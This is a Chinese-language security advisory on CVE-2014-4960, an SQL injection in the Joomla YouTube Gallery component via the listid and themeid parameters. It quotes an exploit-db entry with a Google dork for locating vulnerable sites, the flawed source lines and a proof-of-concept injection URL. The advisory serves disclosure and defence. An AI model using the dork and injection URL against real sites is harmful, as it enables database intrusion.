首页 -> 安全研究

安全研究

安全漏洞
Joomla! YouTube Gallery组件'gallery.php' SQL注入漏洞

发布日期:2014-07-15
更新日期:2014-07-25

受影响系统:
Joomla! YouTube Gallery
描述:
BUGTRAQ  ID: 68676
CVE(CAN) ID: CVE-2014-4960

Youtube Gallery是Joomla!的视频媒体管理解决方案。

Joomla!的Youtube Gallery (com_youtubegallery)组件4.x - 4.1.7, 3.x版本中,models\gallery.php在实现上存在多个SQL注入漏洞,远程攻击者通过index.php的listid或themeid参数,利用此漏洞可执行任意SQL命令。

<*来源:Pham Van Khanh
  
  链接:http://www.exploit-db.com/exploits/34087/
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

# Exploit Title: Joomla component com_youtubegallery - SQL Injection
vulnerability
# Google Dork: inurl:index.php?option=com_youtubegallery
# Date: 15-07-2014
# Exploit Author: Pham Van Khanh (phamvankhanhbka@gmail.com)
# Vendor Homepage: http://www.joomlaboat.com/youtube-gallery
# Software Link: http://www.joomlaboat.com/youtube-gallery
# Version: 4.x ( 3.x maybe)
# Tested on: newest version 4.1.7 on Joomla 1.5, 2.5, 3
# CVE : CVE-2014-4960

Detail:
In line: 40, file: components\com_youtubegallery\models\gallery.php,
if parameter listid is int (or can cast to int), $listid and $themeid
will not santinized.
Source code:
40: if(JRequest::getInt('listid'))
41: {
42:        //Shadow Box
43:        $listid=JRequest::getVar('listid');
44:
45:
46:        //Get Theme
47:         $m_themeid=(int)JRequest::getVar('mobilethemeid');
48:         if($m_themeid!=0)
49:         {
50:              if(YouTubeGalleryMisc::check_user_agent('mobile'))
51:                    $themeid=$m_themeid;
52:              else
53:                    $themeid=JRequest::getVar('themeid');
54:              }
55:          else
56:               $themeid=JRequest::getVar('themeid');
57: }
After, $themeid and $listid are used in line 86, 92. Two method
getVideoListTableRow and getThemeTableRow concat string to construct
sql query. So it is vulnerable to SQL Injection.
Source code:
86: if(!$this->misc->getVideoListTableRow($listid))
87: {
88:         echo '<p>No video found</p>';
89:         return false;
90: }
91:
92: if(!$this->misc->getThemeTableRow($themeid))
93: {
94:          echo '<p>No video found</p>';
95:          return false;
96: }

# Site POF: http://server/index.php?option=com_youtubegallery&view=youtubegallery&listid=1&themeid=1'&videoid=ETMVUuFbToQ&tmpl=component&TB_iframe=true&height=500&width=700

建议:
厂商补丁:

Joomla!
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.joomlaboat.com/youtube-gallery

浏览次数:4030
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障